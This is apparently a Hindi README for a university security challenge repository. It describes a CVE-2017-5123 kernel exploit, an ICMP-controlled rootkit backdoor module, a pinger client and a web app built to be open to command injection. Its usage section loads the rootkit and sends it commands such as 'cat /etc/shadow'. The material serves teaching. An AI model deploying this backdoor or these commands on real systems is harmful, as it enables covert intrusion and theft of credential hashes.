
CVE-2017-5123 कर्नेल शोषण, ICMP-आधारित रूटकिट कमांड-एंड-कंट्रोल, और साइबर सुरक्षा प्रशिक्षण के लिए OS कमांड इंजेक्शन संवेदनशील वेब एप्लिकेशन का शैक्षिक प्रदर्शन।
यह रिपॉजिटरी CVE-2017-5123 का एक प्रदर्शन शामिल करती है, जो एक ICMP कमांड-एंड-कंट्रोल बैकडोर है, और एक CWE-78 (OS कमांड इंजेक्शन) संवेदनशील वेब ऐप है।
CSC 4308 - चैलेंज 3 का भाग।
यह प्रोजेक्ट तीन अलग-अलग सुरक्षा अनुसंधान घटकों को प्रदर्शित करता है:
lkm/rootkit.c)Linux कर्नेल 4.13 में प्रस्तुत waitid सिस्टम कॉल भेद्यता का एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। यह भेद्यता विशेषाधिकार वृद्धि और सैंडबॉक्स एस्केप की अनुमति देती है।
lkm/lkm.c)एक दुर्भावनापूर्ण Linux कर्नेल मॉड्यूल (LKM) जो ICMP इको (पिंग) पैकेट के माध्यम से एक गुप्त कमांड-एंड-कंट्रोल चैनल लागू करता है।
25678 के साथ ICMP इको अनुरोधों को इंटरसेप्ट करता हैvulnerable-app/)एक React + Node.js फ़ाइल-शेयरिंग एप्लिकेशन जो OS कमांड इंजेक्शन के प्रति संवेदनशील है।
pinger/data-ping.c)एक उपयोगिता जो कर्नेल रूटकिट बैकडोर के साथ संचार करने के लिए कस्टम पेलोड के साथ ICMP इको अनुरोध भेजती है।
cd lkm
make
sudo insmod lkm.ko
cd ../pinger
gcc -o data-ping data-ping.c
# रॉ सॉकेट का उपयोग करने के लिए रूट के रूप में चलना आवश्यक है
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"
sudo rmmod lkm
make reload
# फ्रंटएंड बनाएं
cd vulnerable-app/frontend
npm run build
# बिल्ड को बैकएंड में कॉपी करें
cp -r build ../backend/
# बैकएंड सर्वर शुरू करें (एपीआई और फ्रंटएंड दोनों प्रदान करता है)
cd ../backend
npm start
एप्लिकेशन http://localhost:3001 पर उपलब्ध होगा।